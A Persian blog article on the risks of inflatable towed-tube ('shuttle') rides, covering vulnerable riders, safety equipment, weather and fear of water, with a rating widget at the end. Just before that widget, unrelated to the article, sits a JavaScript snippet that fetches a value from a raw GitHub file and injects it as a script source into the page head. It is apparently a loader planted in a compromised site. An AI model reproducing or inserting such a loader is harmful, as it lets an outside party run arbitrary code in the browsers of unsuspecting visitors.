خطرات شاتل بادی

 • خطرات شاتل بادی ممکن است در ذهن هر فرد قبل از سوار شدن بر تیوب بادی بزرگ ( شاتل ) بوجود آید. این تقریح پر هیجان که نکات امنیتی خود را دارد و اکر رعایت نشود باعث خسارت های جانی و مالی می شود.

  خطرات شاتل بحثی است که راجب آن قبل از سوترد شدن بر روی آن بدانید. این مضوع سبس شده کسانی که علاقمندی زیاد به شاتل هستند بیشتر احتیات کرد و از انجام دادن این ورزش پرهیجان اجتناب کنند. چرا فکر می کنید اگه مشکلی برای تناب ، قایق موتوری ، تیوب و یا حتی خود پیش آید محتمل بوده غرق شوند یا به تور ناگهانی پرت شده و مشکلی برای عضلات بدن بوجود آید.

  خطرات شاتل بیشتر برای چه کسانی قابل وقوع است؟

  خطرات تیوب بادی بزرگ برای فرادی مانند سالمندان ، کودکان و خانم های باردار ، افرادی که بیماری های زمینه ای دارند مثل مشکلات تنفسی ، قلبی یا سکته ای احتمالی است چرا که هیجان در تفریح شاتل بالا بوده و برای این افراد قابل تحمل نیست. بدبین ترتیب قطعا دچار مشکل خواهد شد.

  با سرعت بالای که قایق موتری دارد هنگام دور زدن افراد در آب پرت می شوند. که این مشکل خاصی نیست لیدر قایق از عمد این کارا انجام می دهند که هیجان و لذت بیشتری برای افراد داشته باشد

  شاتل بادی

  به چه نکاتی باید قبل از شاتل سواری توجه کرد؟

  اگر افراد قبل از سوار شدن بر تیوپ های شاتل به نکات ایمنی توجه کنند هیچ خطری در انتظارشان نخواهد بود. برای مثال با پوشیدن جلیقه نجات، کلاه ایمنی و لباس مناسب دریا احتمال 1% وقوع حادثه امکان پذیر است. همچنین باید طناب، هارنس، باد تیوپ چک شده تا مبادا در زمان شاتل سواری دچار مشکل شود.

  درهنگام تلاطم امواج دریا طوفان ، باران و باد شدید به درصد های بالای رسیده و ممکن است اغراد اسیب بینند. به همین دلیل در روزی که می خواهید شاتل سوار شوید آب هوا را چک کنیید. این گونه نگرانی خطرات تیوب بادی بزرگ کاهش می یابد و جسارت بیشتری بری سوار شد بر روی تیوب بادی بزرگ را دارید.

   اگر همه تجهیزات تیوب بادی بزرگ سواری با کیفیت بوده و افرادی که تمایل به استفاده از شاتل دارند به توصیه های لیدر توجه کنند. همچنین باید به نکاتی که لیدر درباره نحوه استفاده از تجهیزات بیان می کند با دقت کامل گوش کرد و به درستی از تجهیزات استفاده نمود.

  آیا فوبیای ترس از آب مانع تیوب بادی بزرگ ( شاتل ) سواری می شود؟

  برخی از افراد فوبیای ترس از آب دارند. این ورزش احتمال پرت شدن درون آب را دارد. پس اگر بعضی از گردشگران دچار چنین مشکلی هستند آرامش خود را حفظ کرده و این فرصت را بهترین موقعیت برای غلبه بر ترس شان بدانند. آن ها باید بدانند غریق نجات هایی درون آب هستند که به کمک افراد با کمترین زمان ممکن می شتابند.

  (var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)

  امتیاز شما:

  میانگین امتیازات ۵ از ۵
  از مجموع ۱ رای

  دیدگاهتان را بنویسید